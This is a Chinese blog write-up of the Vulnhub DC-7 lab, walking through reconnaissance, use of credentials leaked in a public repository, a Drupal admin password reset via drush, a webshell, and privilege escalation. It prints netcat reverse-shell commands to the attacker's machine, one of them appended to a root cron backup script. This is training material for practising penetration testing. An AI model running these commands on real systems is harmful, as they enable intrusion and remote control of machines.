G
N
I
D
A
O
L

Vulnhub靶场 | DC系列 | DC-7

DC-7

环境搭建

  1. 靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/
  2. 需要将靶机和 kali 攻击机放在同一个局域网里;
  3. 本实验kali 的 IP 地址:192.168.10.146。

渗透测试

使用 nmap 扫描 192.168.10.0/24 网段存活主机

┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24

经判断,目标主机IP地址为192.168.10.152。

扫描开放的服务。

┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.152

扫描软件版本

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80 192.168.10.152

直接访问web服务。

使用nikto扫一下~

┌──(root💀kali)-[~/桌面]
└─# nikto -h 192.168.10.152

发现robots.txt文件,这也是web中的比较重要的敏感文件。

通过探索CMS漏洞、apache漏洞等,都没有发现利用的点。

靶机的信息告诉我们跳出思维惯性,页面的最先面有一个@DC7USER,既然是@开头,大概率是某个账号信息。所以尝试去谷歌或者github搜索@DC7USER。

https://github.com/Dc7User/staffdb

https://github.com/Dc7User/staffdb/blob/master/config.php

原来这里存在源码泄露~(这...脑洞得多大才能想出来)

在配置文件config.php中存在一个用户名和密码:

  • dc7user:MdR3xOgB7#dW

尝试登录下网站~

但是,登录不成功。

尝试使用该用户名和密码,ssh登录成功。

开始提权

使用find / -perm -u=s 2>/dev/null查找设置了suid文件。

使用sudo -l 看一下自己的sudo授权,提示没有该命令,但是有个新邮件。

dc7user@dc-7:~$ cat /var/mail/dc7user

邮件中提到了两个文件,一个/opt/scripts/backups.sh/home/dc7user/backups/website.sql

查看/opt/scripts/backups.sh内容

貌似是为了备份网站的脚本。

该文件的权限如下

对于当前的dc7user用户来说没有写权限,如果想再该脚本中写入代码,需要是root用户或者属于www-data组。因此还是需要从网站入手,拿到www-data用户权限。

其中 drush 命令,是为了管理drupal网站的工具。(输入drush <回车>可以查看drush可以执行的操作)。

以下命令是为了将数据库进行备份。

drush sql-dump --result-file=/home/dc7user/backups/website.sql

尝试使用drush修改管理员admin的密码

dc7user@dc-7:~$ drush user-password admin --password="123"

直接修改不成功,需要先切换到/var/www/html目录

dc7user@dc-7:~$ cd /var/www/html
dc7user@dc-7:/var/www/html$ drush user-password admin --password="123"

使用修改后的密码登录网站成功。

接下来想办法写马,获取到webshell。

直接将马写在文章中,不行,直接原样输出了。

有上传图片的位置,尝试下图片马,很不幸失败了~

在Drupal官网上查询,

使用中国蚁剑连接

使用nc反弹shell到kali

┌──(root💀kali)-[~/桌面]
└─# nc -lvvp 5555    // kali监听

// 蚁剑连接
(www-data:/var/www/html) $ nc 192.168.10.146 5555 -e /bin/bash  

使用python获得个交互shell。

www-data@dc-7:/var/www/html$ echo "nc 192.168.10.146 3333 -e /bin/bash" >> /opt/scripts/backups.sh

kali监听,等待计划任务开启,建立连接

📌参考链接

posted @ 2024-07-13 19:04  leyilea  阅读(281)  评论(0)    收藏  举报